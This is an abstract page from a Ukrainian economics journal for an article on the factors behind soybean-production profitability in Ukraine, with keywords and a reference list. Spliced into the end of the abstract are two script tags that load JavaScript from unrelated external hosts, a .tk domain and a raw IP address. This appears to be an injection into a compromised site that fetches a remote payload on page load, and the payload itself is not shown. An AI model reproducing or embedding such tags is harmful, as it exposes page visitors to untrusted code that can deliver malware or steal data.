ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 330.143.1;635.655(477.44)
Фінансові відносини та бухгалтерський облік

Вплив виробничих факторів на рентабельність соєвиробництва в Україні / Бойко О. О. // Економіка АПК. - 2013. - № 3 - С. 46

Підвищення рівня виробництва та використання сої розглядається як суттєвий чинник покращення показників ефективності всіх галузей сільського господарства, як результат створення сприятливих умов для землеробства, кормовиробництва, підвищення продуктивності тварин та є основою досягнення конкурентоспроможності аграрного сектору економіки України у світовому поділі праці. Проведено аналіз залежності економічної ефективності виробництва сої від факторів впливу на неї урожайності та собівартості по Україні порівняно з Вінницькою областю. Застосування методів аналітичного групування по ряду виробничо-економічних ознак виявило, що основними факторами, які впливають на абсолютні й відносні показники прибутковості соєвиробництва, є виробнича собівартість та урожайність сої. Кореляційно-регресійний аналіз залежності економічної ефективності виробництва від виявлених факторів впливу свідчить про тісні зв’язки між досліджуваними показниками. Табл.: 4. Рис.: 2. Бібліогр.: 11.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: економічний аналіз, собівартість, урожайність, економічна ефективність, рентабельність, соя

Список використаних джерел

 1. Бабич А.О. Сучасне виробництво і використання сої / А. О. Бабич– К.: Урожай, 1993. – 432 с.
 2. Бабич А. Соєвий пояс і розміщення виробництва сортів сої в Україні / А. Бабич, А. Бабич-Побережна // Пропозиція. – 2010. – № 4. – С. 52–56.
 3. Бєляєв О. В. Ринок сої та продукції її переробки в Україні / О. В. Бєляєв //Зб. наук. праць Луганського держ. аграр. ун-ту; за ред. В.Г. Ткаченко. – Луганськ: Вид-во «Элтон», 2002.-№14(26).- 446 с.
 4. Заболотний О. Г. Проблеми підвищення ефективності виробництва сої і технології її переробки : моногр. / О. Г. Заболотний. – Вінниця : Книга-Вега, 2006. – 168 с.
 5. Заверюхин В.И. Производство и использование сои / В.И. Заверюхин, И.Л. Левандовский. – К.: Урожай, 1988. – 112 с.
 6. Формування ринку сої та продуктів в Україні/ М.В. Калінчик, М.М.Ільчук, О.В. Беляев та ін.–К.: Нічлава, 2007. – 198 с.
 7. Петриченко В.Ф. Виробництво та використання сої в Україні / В.Ф. Петриченко// Вісн. аграр. науки: Науково–теоретичний журнал Української академії аграрних наук. – 2008.–№3. – С.24–27.
 8. Устік Т.В. Економічна оцінка сучасного стану ринку сої / Т. В. Устік // Розвиток наукових досліджень 2008: матеріали четвертої міжнар. наук.–практ. конф. – Полтава: Вид–во “ІнтерГрафіка”, 2008. – т.15. – С.104–107.
 9. Устік Т.В. Шляхи вдосконалення економічного розвитку підприємств–виробників сої в умовах ринку [наукове видання] / Т.В. Устік. – Суми: ВВП «Мрія», 2009 – 48 с.
 10. Фролов В. Соя: плюсы и минусы / В. Фролов, Н. Сарбатова, О. Сычёва // Животноводство России. – 2007. – № 11. – С. 54–55.
 11. Berglund D.R. Soybean production. NDSU / Berglund D.R., Helms T.C. // Extension service, march 1992. – 8 p.
Читати статтю: 13_03_06.pdf